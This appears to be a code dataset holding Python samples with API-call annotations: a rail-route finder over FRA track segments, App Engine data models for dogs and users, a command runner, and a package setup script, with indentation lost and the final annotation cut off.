cr_block = np.array([],dtype=int)
cl_block = np.array([],dtype=int)
for i in index:
cid = feats[i]['properties']['FRAARCID']
coords = feats[i]['geometry']['coordinates']
c1 = coords[0]
c2 = coords[-1]
if cid == stpaulid:
if c1[0] > c2[0]: stpaul = c1
else: stpaul = c2
if cid == stpaul_iarr_cid or cid == portland_cid:
eb_block = np.append(eb_block,i)
if cid == seattleid:
if c1[1] < c2[1]: seattle = c1
else: seattle = c2
if cid == laid:
if c1[1] < c2[1]: la = c1
else: la = c2
if cid == seattleid or cid == portland_cid or cid == 189128\
or cid == 244148 or cid == 254149:
cs_block = np.append(cs_block,i)
if cid == palmspringsid:
if c1[0] < c2[0]: palmsprings = c1
else: palmsprings = c2
if cid == neworleansid_end:
if c1[0] > c2[0]: neworleans_end = c1
else: neworleans_end = c2
if cid == 263258 or cid == 266284 or cid == 178673:
sl_block = np.append(sl_block,i)
if cid == neworleansid_start:
if c1[0] > c2[0]: neworleans_start = c1
else: neworleans_start = c2
if cid == phillyid:
if c1[1] > c2[1]: philly = c1
else: philly = c2
if cid == 243812 or cid == 204623 or cid == 169919 or cid == 169921\
or cid == 125491 or cid == 164053 or cid == 275062 or cid == 261822:
cr_block = np.append(cr_block,i)
if cid == dcid:
if c1[1] < c2[1]: dc = c1
else: dc = c2
if cid == chicagoid:
if c1[1] > c2[1]: chicago = c1
else: chicago = c2
if cid == 252822 or cid == 164114 or cid == 252939 or cid == 152297\
or cid == 197933 or cid == 197961 or cid == 192650 or cid == 192649\
or cid == 253070 or cid == 256677 or cid == 193489 or cid == 266257\
or cid == 266676:
cl_block = np.append(cl_block,i)
cid = [feats[i]['properties']['FRAARCID'] for i in index]
if newredund:
#Identify redundant track segments
fraarcid = [feats[i]['properties']['FRAARCID'] for i in index]
iredund = np.array([],dtype=int)
np.save(local+'redundant',iredund)
redundant = find_redundancy.main(index,strt,end,fraarcid,local)
#SAVE STUFF
np.savez(local+'endpts',index=index,strt=strt,end=end,cid=cid,
stpaul=stpaul,seattle=seattle,la=la,palmsprings=palmsprings,
neworleans_end=neworleans_end,neworleans_start=neworleans_start,
philly=philly,dc=dc,chicago=chicago,eb_block=eb_block,
cs_block=cs_block,sl_block=sl_block,cr_block=cr_block,cl_block=cl_block)
print('saved endpts arrays and city GPS coords')
else:
f=np.load(local+'endpts.npz')
index = f['index']
strt = f['strt']
end = f['end']
cid = f['cid']
stpaul = f['stpaul']
eb_block = f['eb_block']
seattle = f['seattle']
la = f['la']
cs_block = f['cs_block']
palmsprings = f['palmsprings']
neworleans_end = f['neworleans_end']
sl_block = f['sl_block']
neworleans_start = f['neworleans_start']
philly = f['philly']
cr_block = f['cr_block']
dc = f['dc']
chicago = f['chicago']
cl_block = f['cl_block']
#EMPIRE BUILDER
if 1:
print('finding EMPIRE BUILDER routes')
ptA = [stpaul]
iredund = np.load(local+'redundant.npy')
#for i in eb_block: iredund = np.append(iredund,i)
iarr = np.array([],dtype=int)
if not cont: np.savez(rb+'partial',ptA=ptA,iarr=iarr)
partials = glob.glob(rb+'*.npz')
while len(partials) > 0:
level = 0
with np.load(partials[0]) as f:
ptA = f['ptA']
iarr = f['iarr']
os.remove(partials[0])
route_builder.main(ptA,iarr,seattle,rb+'empire_builder',level,\
iredund,arrive=arrive)
partials = glob.glob(rb+'*.npz')
#COAST STARLIGHT
if 0:
print('finding COAST STARLIGHT routes')
ptA = [seattle]
ptB = la
iredund = np.load(local+'redundant.npy')
for i in cs_block:
iredund = np.append(iredund,i)
iarr = np.array([],dtype=int)
if not cont: np.savez(rb+'partial',ptA=ptA,iarr=iarr)
partials = glob.glob(rb+'*.npz')
while len(partials) > 0:
level = 0
with np.load(partials[0]) as f:
ptA = f['ptA']
iarr = f['iarr']
os.remove(partials[0])
route_builder.main(ptA,iarr,ptB,rb+'coast_starlight',level,\
iredund,arrive=arrive)
partials = glob.glob(rb+'*.npz')
#SUNSET LIMITED
if 0:
print('finding SUNSET LIMITED routes')
ptA = [palmsprings]
ptB = neworleans_end
iredund = np.load(local+'redundant.npy')
for i in sl_block:
iredund = np.append(iredund,i)
iarr = np.array([],dtype=int)
if not cont: np.savez(rb+'partial',ptA=ptA,iarr=iarr)
partials = glob.glob(rb+'*.npz')
while len(partials) > 0:
level = 0
with np.load(partials[0]) as f:
ptA = f['ptA']
iarr = f['iarr']
os.remove(partials[0])
route_builder.main(ptA,iarr,ptB,rb+'sunset_limited',\
level,iredund,arrive=arrive)
partials = glob.glob(rb+'*.npz')
#CRESCENT
if 0:
print('finding CRESCENT routes')
ptA = [neworleans_start]
ptB = philly
iredund = np.load(local+'redundant.npy')
for i in cr_block:
iredund = np.append(iredund,i)
iarr = np.array([],dtype=int)
if not cont: np.savez(rb+'partial',ptA=ptA,iarr=iarr)
partials = glob.glob(rb+'*.npz')
while len(partials) > 0:
level = 0
with np.load(partials[0]) as f:
ptA = f['ptA']
iarr = f['iarr']
os.remove(partials[0])
route_builder.main(ptA,iarr,ptB,rb+'crescent',level,iredund,arrive=arrive)
partials = glob.glob(rb+'*.npz')
#CAPITOL LIMITED
if 0:
print('finding CAPITOL LIMITED routes')
ptA = [dc]
ptB = chicago
iredund = np.load(local+'redundant.npy')
for i in cl_block:
iredund = np.append(iredund,i)
iarr = np.array([],dtype=int)
if not cont: np.savez(rb+'partial',ptA=ptA,iarr=iarr)
partials = glob.glob(rb+'*.npz')
while len(partials) > 0:
level = 0
with np.load(partials[0]) as f:
ptA = f['ptA']
iarr = f['iarr']
os.remove(partials[0])
route_builder.main(ptA,iarr,ptB,rb+'capitol_limited',level,\
iredund,arrive=arrive)
partials = glob.glob(rb+'*.npz')
|
[
"numpy.load",
"json.load",
"numpy.save",
"os.remove",
"numpy.append",
"os.path.isfile",
"numpy.array",
"glob.glob",
"find_redundancy.main",
"numpy.savez",
"route_builder.main"
] |
[((1579, 1602), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (1587, 1602), True, 'import numpy as np\n'), ((1621, 1644), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (1629, 1644), True, 'import numpy as np\n'), ((1663, 1686), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (1671, 1686), True, 'import numpy as np\n'), ((1705, 1728), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (1713, 1728), True, 'import numpy as np\n'), ((1747, 1770), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (1755, 1770), True, 'import numpy as np\n'), ((4384, 4734), 'numpy.savez', 'np.savez', (["(local + 'endpts')"], {'index': 'index', 'strt': 'strt', 'end': 'end', 'cid': 'cid', 'stpaul': 'stpaul', 'seattle': 'seattle', 'la': 'la', 'palmsprings': 'palmsprings', 'neworleans_end': 'neworleans_end', 'neworleans_start': 'neworleans_start', 'philly': 'philly', 'dc': 'dc', 'chicago': 'chicago', 'eb_block': 'eb_block', 'cs_block': 'cs_block', 'sl_block': 'sl_block', 'cr_block': 'cr_block', 'cl_block': 'cl_block'}), "(local + 'endpts', index=index, strt=strt, end=end, cid=cid, stpaul\n =stpaul, seattle=seattle, la=la, palmsprings=palmsprings,\n neworleans_end=neworleans_end, neworleans_start=neworleans_start,\n philly=philly, dc=dc, chicago=chicago, eb_block=eb_block, cs_block=\n cs_block, sl_block=sl_block, cr_block=cr_block, cl_block=cl_block)\n", (4392, 4734), True, 'import numpy as np\n'), ((4847, 4876), 'numpy.load', 'np.load', (["(local + 'endpts.npz')"], {}), "(local + 'endpts.npz')\n", (4854, 4876), True, 'import numpy as np\n'), ((5552, 5584), 'numpy.load', 'np.load', (["(local + 'redundant.npy')"], {}), "(local + 'redundant.npy')\n", (5559, 5584), True, 'import numpy as np\n'), ((5657, 5680), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (5665, 5680), True, 'import numpy as np\n'), ((5761, 5784), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (5770, 5784), False, 'import glob\n'), ((6295, 6327), 'numpy.load', 'np.load', (["(local + 'redundant.npy')"], {}), "(local + 'redundant.npy')\n", (6302, 6327), True, 'import numpy as np\n'), ((6411, 6434), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (6419, 6434), True, 'import numpy as np\n'), ((6515, 6538), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (6524, 6538), False, 'import glob\n'), ((7060, 7092), 'numpy.load', 'np.load', (["(local + 'redundant.npy')"], {}), "(local + 'redundant.npy')\n", (7067, 7092), True, 'import numpy as np\n'), ((7176, 7199), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (7184, 7199), True, 'import numpy as np\n'), ((7280, 7303), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (7289, 7303), False, 'import glob\n'), ((7809, 7841), 'numpy.load', 'np.load', (["(local + 'redundant.npy')"], {}), "(local + 'redundant.npy')\n", (7816, 7841), True, 'import numpy as np\n'), ((7925, 7948), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (7933, 7948), True, 'import numpy as np\n'), ((8029, 8052), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (8038, 8052), False, 'import glob\n'), ((8520, 8552), 'numpy.load', 'np.load', (["(local + 'redundant.npy')"], {}), "(local + 'redundant.npy')\n", (8527, 8552), True, 'import numpy as np\n'), ((8636, 8659), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (8644, 8659), True, 'import numpy as np\n'), ((8740, 8763), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (8749, 8763), False, 'import glob\n'), ((511, 547), 'os.path.isfile', 'os.path.isfile', (["(local + 'endpts.npz')"], {}), "(local + 'endpts.npz')\n", (525, 547), False, 'import os\n'), ((615, 627), 'json.load', 'json.load', (['f'], {}), '(f)\n', (624, 627), False, 'import json\n'), ((4201, 4224), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (4209, 4224), True, 'import numpy as np\n'), ((4236, 4273), 'numpy.save', 'np.save', (["(local + 'redundant')", 'iredund'], {}), "(local + 'redundant', iredund)\n", (4243, 4273), True, 'import numpy as np\n'), ((4295, 4350), 'find_redundancy.main', 'find_redundancy.main', (['index', 'strt', 'end', 'fraarcid', 'local'], {}), '(index, strt, end, fraarcid, local)\n', (4315, 4350), False, 'import find_redundancy\n'), ((5701, 5745), 'numpy.savez', 'np.savez', (["(rb + 'partial')"], {'ptA': 'ptA', 'iarr': 'iarr'}), "(rb + 'partial', ptA=ptA, iarr=iarr)\n", (5709, 5745), True, 'import numpy as np\n'), ((5958, 5980), 'os.remove', 'os.remove', (['partials[0]'], {}), '(partials[0])\n', (5967, 5980), False, 'import os\n'), ((5993, 6089), 'route_builder.main', 'route_builder.main', (['ptA', 'iarr', 'seattle', "(rb + 'empire_builder')", 'level', 'iredund'], {'arrive': 'arrive'}), "(ptA, iarr, seattle, rb + 'empire_builder', level,\n iredund, arrive=arrive)\n", (6011, 6089), False, 'import route_builder\n'), ((6134, 6157), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (6143, 6157), False, 'import glob\n'), ((6375, 6396), 'numpy.append', 'np.append', (['iredund', 'i'], {}), '(iredund, i)\n', (6384, 6396), True, 'import numpy as np\n'), ((6455, 6499), 'numpy.savez', 'np.savez', (["(rb + 'partial')"], {'ptA': 'ptA', 'iarr': 'iarr'}), "(rb + 'partial', ptA=ptA, iarr=iarr)\n", (6463, 6499), True, 'import numpy as np\n'), ((6712, 6734), 'os.remove', 'os.remove', (['partials[0]'], {}), '(partials[0])\n', (6721, 6734), False, 'import os\n'), ((6747, 6840), 'route_builder.main', 'route_builder.main', (['ptA', 'iarr', 'ptB', "(rb + 'coast_starlight')", 'level', 'iredund'], {'arrive': 'arrive'}), "(ptA, iarr, ptB, rb + 'coast_starlight', level, iredund,\n arrive=arrive)\n", (6765, 6840), False, 'import route_builder\n'), ((6885, 6908), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (6894, 6908), False, 'import glob\n'), ((7140, 7161), 'numpy.append', 'np.append', (['iredund', 'i'], {}), '(iredund, i)\n', (7149, 7161), True, 'import numpy as np\n'), ((7220, 7264), 'numpy.savez', 'np.savez', (["(rb + 'partial')"], {'ptA': 'ptA', 'iarr': 'iarr'}), "(rb + 'partial', ptA=ptA, iarr=iarr)\n", (7228, 7264), True, 'import numpy as np\n'), ((7477, 7499), 'os.remove', 'os.remove', (['partials[0]'], {}), '(partials[0])\n', (7486, 7499), False, 'import os\n'), ((7512, 7604), 'route_builder.main', 'route_builder.main', (['ptA', 'iarr', 'ptB', "(rb + 'sunset_limited')", 'level', 'iredund'], {'arrive': 'arrive'}), "(ptA, iarr, ptB, rb + 'sunset_limited', level, iredund,\n arrive=arrive)\n", (7530, 7604), False, 'import route_builder\n'), ((7649, 7672), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (7658, 7672), False, 'import glob\n'), ((7889, 7910), 'numpy.append', 'np.append', (['iredund', 'i'], {}), '(iredund, i)\n', (7898, 7910), True, 'import numpy as np\n'), ((7969, 8013), 'numpy.savez', 'np.savez', (["(rb + 'partial')"], {'ptA': 'ptA', 'iarr': 'iarr'}), "(rb + 'partial', ptA=ptA, iarr=iarr)\n", (7977, 8013), True, 'import numpy as np\n'), ((8226, 8248), 'os.remove', 'os.remove', (['partials[0]'], {}), '(partials[0])\n', (8235, 8248), False, 'import os\n'), ((8261, 8348), 'route_builder.main', 'route_builder.main', (['ptA', 'iarr', 'ptB', "(rb + 'crescent')", 'level', 'iredund'], {'arrive': 'arrive'}), "(ptA, iarr, ptB, rb + 'crescent', level, iredund, arrive=\n arrive)\n", (8279, 8348), False, 'import route_builder\n'), ((8359, 8382), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (8368, 8382), False, 'import glob\n'), ((8600, 8621), 'numpy.append', 'np.append', (['iredund', 'i'], {}), '(iredund, i)\n', (8609, 8621), True, 'import numpy as np\n'), ((8680, 8724), 'numpy.savez', 'np.savez', (["(rb + 'partial')"], {'ptA': 'ptA', 'iarr': 'iarr'}), "(rb + 'partial', ptA=ptA, iarr=iarr)\n", (8688, 8724), True, 'import numpy as np\n'), ((8937, 8959), 'os.remove', 'os.remove', (['partials[0]'], {}), '(partials[0])\n', (8946, 8959), False, 'import os\n'), ((8972, 9065), 'route_builder.main', 'route_builder.main', (['ptA', 'iarr', 'ptB', "(rb + 'capitol_limited')", 'level', 'iredund'], {'arrive': 'arrive'}), "(ptA, iarr, ptB, rb + 'capitol_limited', level, iredund,\n arrive=arrive)\n", (8990, 9065), False, 'import route_builder\n'), ((9110, 9133), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (9119, 9133), False, 'import glob\n'), ((2169, 2191), 'numpy.append', 'np.append', (['eb_block', 'i'], {}), '(eb_block, i)\n', (2178, 2191), True, 'import numpy as np\n'), ((2556, 2578), 'numpy.append', 'np.append', (['cs_block', 'i'], {}), '(cs_block, i)\n', (2565, 2578), True, 'import numpy as np\n'), ((2932, 2954), 'numpy.append', 'np.append', (['sl_block', 'i'], {}), '(sl_block, i)\n', (2941, 2954), True, 'import numpy as np\n'), ((3400, 3422), 'numpy.append', 'np.append', (['cr_block', 'i'], {}), '(cr_block, i)\n', (3409, 3422), True, 'import numpy as np\n'), ((3946, 3968), 'numpy.append', 'np.append', (['cl_block', 'i'], {}), '(cl_block, i)\n', (3955, 3968), True, 'import numpy as np\n'), ((5855, 5875), 'numpy.load', 'np.load', (['partials[0]'], {}), '(partials[0])\n', (5862, 5875), True, 'import numpy as np\n'), ((6609, 6629), 'numpy.load', 'np.load', (['partials[0]'], {}), '(partials[0])\n', (6616, 6629), True, 'import numpy as np\n'), ((7374, 7394), 'numpy.load', 'np.load', (['partials[0]'], {}), '(partials[0])\n', (7381, 7394), True, 'import numpy as np\n'), ((8123, 8143), 'numpy.load', 'np.load', (['partials[0]'], {}), '(partials[0])\n', (8130, 8143), True, 'import numpy as np\n'), ((8834, 8854), 'numpy.load', 'np.load', (['partials[0]'], {}), '(partials[0])\n', (8841, 8854), True, 'import numpy as np\n')]
|
from google.appengine.ext import ndb
class Dog(ndb.Model):
name = ndb.StringProperty()
breed = ndb.StringProperty()
gender = ndb.StringProperty()
age = ndb.StringProperty()
size = ndb.StringProperty()
socialLevel = ndb.StringProperty()
activityLevel = ndb.StringProperty()
profilePic = ndb.BlobProperty()
ownerEmail = ndb.StringProperty()
class UserProfile(ndb.Model):
name = ndb.StringProperty()
email = ndb.StringProperty()
dogs = ndb.KeyProperty(Dog, repeated=True)
city = ndb.StringProperty()
state = ndb.StringProperty()
age = ndb.IntegerProperty()
sex = ndb.StringProperty(choices=["Female", "Male", "Prefer not to say"])
profilePic = ndb.BlobProperty()
|
[
"google.appengine.ext.ndb.BlobProperty",
"google.appengine.ext.ndb.IntegerProperty",
"google.appengine.ext.ndb.StringProperty",
"google.appengine.ext.ndb.KeyProperty"
] |
[((71, 91), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (89, 91), False, 'from google.appengine.ext import ndb\n'), ((104, 124), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (122, 124), False, 'from google.appengine.ext import ndb\n'), ((138, 158), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (156, 158), False, 'from google.appengine.ext import ndb\n'), ((169, 189), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (187, 189), False, 'from google.appengine.ext import ndb\n'), ((201, 221), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (219, 221), False, 'from google.appengine.ext import ndb\n'), ((240, 260), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (258, 260), False, 'from google.appengine.ext import ndb\n'), ((281, 301), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (299, 301), False, 'from google.appengine.ext import ndb\n'), ((319, 337), 'google.appengine.ext.ndb.BlobProperty', 'ndb.BlobProperty', ([], {}), '()\n', (335, 337), False, 'from google.appengine.ext import ndb\n'), ((355, 375), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (373, 375), False, 'from google.appengine.ext import ndb\n'), ((418, 438), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (436, 438), False, 'from google.appengine.ext import ndb\n'), ((451, 471), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (469, 471), False, 'from google.appengine.ext import ndb\n'), ((483, 518), 'google.appengine.ext.ndb.KeyProperty', 'ndb.KeyProperty', (['Dog'], {'repeated': '(True)'}), '(Dog, repeated=True)\n', (498, 518), False, 'from google.appengine.ext import ndb\n'), ((530, 550), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (548, 550), False, 'from google.appengine.ext import ndb\n'), ((563, 583), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (581, 583), False, 'from google.appengine.ext import ndb\n'), ((594, 615), 'google.appengine.ext.ndb.IntegerProperty', 'ndb.IntegerProperty', ([], {}), '()\n', (613, 615), False, 'from google.appengine.ext import ndb\n'), ((626, 693), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {'choices': "['Female', 'Male', 'Prefer not to say']"}), "(choices=['Female', 'Male', 'Prefer not to say'])\n", (644, 693), False, 'from google.appengine.ext import ndb\n'), ((711, 729), 'google.appengine.ext.ndb.BlobProperty', 'ndb.BlobProperty', ([], {}), '()\n', (727, 729), False, 'from google.appengine.ext import ndb\n')]
|
import argparse
import inspect
import logging
import logging.config
import os
import pkgutil
import sys
from aiokts.managecommands import Command
from aiokts.store import Store
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(CURRENT_DIR)
class BaseManage(object):
commands_package_path = None
store_cls = Store
_modules = {}
_commands = None
def __init__(self):
self._logger = None
assert self.commands_package_path is not None, \
'Must specify path to where commands are'
self.commands_package_path = os.path.abspath(
os.path.join(
os.path.dirname(inspect.getfile(self.__class__)),
self.commands_package_path))
self.logger.debug('Commands path: %s', self.commands_package_path)
@property
def commands(self):
if self._commands is None:
self._commands = ['help']
for loader, name, ispkg in \
pkgutil.iter_modules([self.commands_package_path]):
if not ispkg:
self._commands.append(name)
self._modules[name] = loader.find_module(name)
return self._commands
@property
def config(self):
return {}
@property
def debug(self):
return self.config.get('debug', False)
def help(self):
print('Available commands:\n - %s' % ('\n - '.join(self.commands)))
def run(self):
args = self._parse_manage_arguments()
command = None
try:
command = args.command
if command not in self.commands:
logging.error('Command %s not found' % command)
self.help()
return 1
if command == 'help':
self.help()
return 0
self._run_command(command, *args.opts)
except Exception:
self.logger.exception('Exception while running command %s',
command)
return 2
except BaseException:
self.logger.exception('Exception while running command %s',
command)
return 3
def _run_command(self, command, *args):
module = self._modules[command].load_module(command)
if hasattr(module, 'main'):
module.main(*args)
cmd_cls = None
for name, cls in module.__dict__.items():
if isinstance(cls, type) and issubclass(cls, Command)\
and cls.__module__ == module.__name__:
cmd_cls = cls
break
assert cmd_cls is not None, \
"Couldn't find Command in command {}".format(command)
cmd = cmd_cls(self)
cmd.run(*args)
def _parse_manage_arguments(self):
parser = argparse.ArgumentParser()
parser.add_argument('command', help='command to execute')
parser.add_argument('opts', nargs=argparse.REMAINDER, default=None)
args = parser.parse_args()
return args
@property
def logger(self):
if self._logger is None:
self._logger = logging.getLogger('Manager')
return self._logger
def main(manager_cls):
manage = manager_cls()
exit(manage.run())
if __name__ == '__main__':
main(Manage)
|
[
"sys.path.append",
"os.path.abspath",
"logging.error",
"argparse.ArgumentParser",
"inspect.getfile",
"pkgutil.iter_modules",
"logging.getLogger"
] |
[((236, 264), 'sys.path.append', 'sys.path.append', (['CURRENT_DIR'], {}), '(CURRENT_DIR)\n', (251, 264), False, 'import sys\n'), ((209, 234), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (224, 234), False, 'import os\n'), ((2859, 2884), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2882, 2884), False, 'import argparse\n'), ((991, 1041), 'pkgutil.iter_modules', 'pkgutil.iter_modules', (['[self.commands_package_path]'], {}), '([self.commands_package_path])\n', (1011, 1041), False, 'import pkgutil\n'), ((3180, 3208), 'logging.getLogger', 'logging.getLogger', (['"""Manager"""'], {}), "('Manager')\n", (3197, 3208), False, 'import logging\n'), ((1652, 1699), 'logging.error', 'logging.error', (["('Command %s not found' % command)"], {}), "('Command %s not found' % command)\n", (1665, 1699), False, 'import logging\n'), ((664, 695), 'inspect.getfile', 'inspect.getfile', (['self.__class__'], {}), '(self.__class__)\n', (679, 695), False, 'import inspect\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Setup file for ggcq.
This file was generated with PyScaffold 1.2, a tool that easily
puts up a scaffold for your new Python project. Learn more under:
http://pyscaffold.readthedocs.org/
"""
import inspect
import os
import sys
from distutils.cmd import Command
import setuptools
from setuptools import setup
from setuptools.command.test import test as TestCommand
from distutils.extension import Extension
import versioneer
__location__ = os.path.join(os.getcwd(), os.path.dirname(
inspect.getfile(inspect.currentframe())))
# Change these settings according to your needs
MAIN_PACKAGE = "ggcq"
DESCRIPTION = (
"Scientific Python Package for G/G/c Queueing Simulation"
)
LICENSE = "apache"
URL = "http://github.com/andsor/pyggcq"
AUTHOR = "<NAME>"
EMAIL = "<EMAIL>"
# Add here all kinds of additional classifiers as defined under
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
CLASSIFIERS = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Physics',
]
# Add here console scripts like ['hello_world = devs.module:function']
CONSOLE_SCRIPTS = []
# Versioneer configuration
versioneer.VCS = 'git'
versioneer.versionfile_source = os.path.join(MAIN_PACKAGE, '_version.py')
versioneer.versionfile_build = os.path.join(MAIN_PACKAGE, '_version.py')
versioneer.tag_prefix = 'v' # tags are like v1.2.0
versioneer.parentdir_prefix = MAIN_PACKAGE + '-'
class Tox(TestCommand):
user_options = [
('tox-args=', 'a', "Arguments to pass to tox"),
]
def initialize_options(self):
TestCommand.initialize_options(self)
self.tox_args = None
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
# import here, cause outside the eggs aren't loaded
import tox
import shlex
errno = tox.cmdline(
args=shlex.split(self.tox_args) if self.tox_args else None
)
sys.exit(errno)
class ToxAutoDocs(Tox):
def finalize_options(self):
Tox.finalize_options(self)
if self.tox_args is None:
self.tox_args = ''
self.tox_args += ' -e autodocs '
def sphinx_builder():
try:
from sphinx.setup_command import BuildDoc
except ImportError:
class NoSphinx(Command):
user_options = []
def initialize_options(self):
raise RuntimeError("Sphinx documentation is not installed, "
"run: pip install sphinx")
return NoSphinx
class BuildSphinxDocs(BuildDoc):
def run(self):
if self.builder == "doctest":
import sphinx.ext.doctest as doctest
# Capture the DocTestBuilder class in order to return the total
# number of failures when exiting
ref = capture_objs(doctest.DocTestBuilder)
BuildDoc.run(self)
errno = ref[-1].total_failures
sys.exit(errno)
else:
BuildDoc.run(self)
return BuildSphinxDocs
class ObjKeeper(type):
instances = {}
def __init__(cls, name, bases, dct):
cls.instances[cls] = []
def __call__(cls, *args, **kwargs):
cls.instances[cls].append(super(ObjKeeper, cls).__call__(*args,
**kwargs))
return cls.instances[cls][-1]
def capture_objs(cls):
from six import add_metaclass
module = inspect.getmodule(cls)
name = cls.__name__
keeper_class = add_metaclass(ObjKeeper)(cls)
setattr(module, name, keeper_class)
cls = getattr(module, name)
return keeper_class.instances[cls]
def get_install_requirements(path):
content = open(os.path.join(__location__, path)).read()
return [req for req in content.split("\\n") if req != '']
def read(fname):
return open(os.path.join(__location__, fname)).read()
def setup_package():
# Assemble additional setup commands
cmdclass = versioneer.get_cmdclass()
cmdclass['docs'] = sphinx_builder()
cmdclass['doctest'] = sphinx_builder()
cmdclass['test'] = Tox
cmdclass['autodocs'] = ToxAutoDocs
# Some helper variables
version = versioneer.get_version()
docs_path = os.path.join(__location__, "docs")
docs_build_path = os.path.join(docs_path, "_build")
install_reqs = get_install_requirements("requirements.txt")
extra_doc_reqs = get_install_requirements("requirements-doc.txt")
command_options = {
'docs': {'project': ('setup.py', MAIN_PACKAGE),
'version': ('setup.py', version.split('-', 1)[0]),
'release': ('setup.py', version),
'build_dir': ('setup.py', docs_build_path),
'config_dir': ('setup.py', docs_path),
'source_dir': ('setup.py', docs_path)},
'doctest': {'project': ('setup.py', MAIN_PACKAGE),
'version': ('setup.py', version.split('-', 1)[0]),
'release': ('setup.py', version),
'build_dir': ('setup.py', docs_build_path),
'config_dir': ('setup.py', docs_path),
'source_dir': ('setup.py', docs_path),
'builder': ('setup.py', 'doctest')},
'test': {'test_suite': ('setup.py', 'tests')},
}
setup(name=MAIN_PACKAGE,
version=version,
url=URL,
description=DESCRIPTION,
author=AUTHOR,
author_email=EMAIL,
license=LICENSE,
long_description=read('README.rst'),
classifiers=CLASSIFIERS,
test_suite='tests',
packages=setuptools.find_packages(exclude=['tests', 'tests.*']),
install_requires=install_reqs,
setup_requires=['six', 'setuptools_git>=1.1'],
cmdclass=cmdclass,
tests_require=['tox'],
command_options=command_options,
entry_points={'console_scripts': CONSOLE_SCRIPTS},
extras_require={
'docs': extra_doc_reqs,
},
include_package_data=True, # include everything in source control
# but exclude these files
exclude_package_data={'': ['.gitignore']},
)
if __name__ == "__main__":
setup_package()
|
[
"versioneer.get_version",
"setuptools.find_packages",
"os.getcwd",
"shlex.split",
"sphinx.setup_command.BuildDoc.run",
"versioneer.get_cmdclass",
"six.add_metaclass",
"inspect.getmodule",
"setuptools.command.test.test.finalize_options",
"inspect.currentframe",
"os.path.join",
"setuptools.command.test.test.initialize_options",
"sys.exit"
] |
[((1536, 1577), 'os.path.join', 'os.path.join', (['MAIN_PACKAGE', '"""_version.py"""'], {}), "(MAIN_PACKAGE, '_version.py')\n", (1548, 1577), False, 'import os\n'), ((1609, 1650), 'os.path.join', 'os.path.join', (['MAIN_PACKAGE', '"""_version.py"""'], {}), "(MAIN_PACKAGE, '_version.py')\n", (1621, 1650), False, 'import os\n'), ((523, 534), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (532, 534), False, 'import os\n'), ((3901, 3923), 'inspect.getmodule', 'inspect.getmodule', (['cls'], {}), '(cls)\n', (3918, 3923), False, 'import inspect\n'), ((4424, 4449), 'versioneer.get_cmdclass', 'versioneer.get_cmdclass', ([], {}), '()\n', (4447, 4449), False, 'import versioneer\n'), ((4642, 4666), 'versioneer.get_version', 'versioneer.get_version', ([], {}), '()\n', (4664, 4666), False, 'import versioneer\n'), ((4683, 4717), 'os.path.join', 'os.path.join', (['__location__', '"""docs"""'], {}), "(__location__, 'docs')\n", (4695, 4717), False, 'import os\n'), ((4740, 4773), 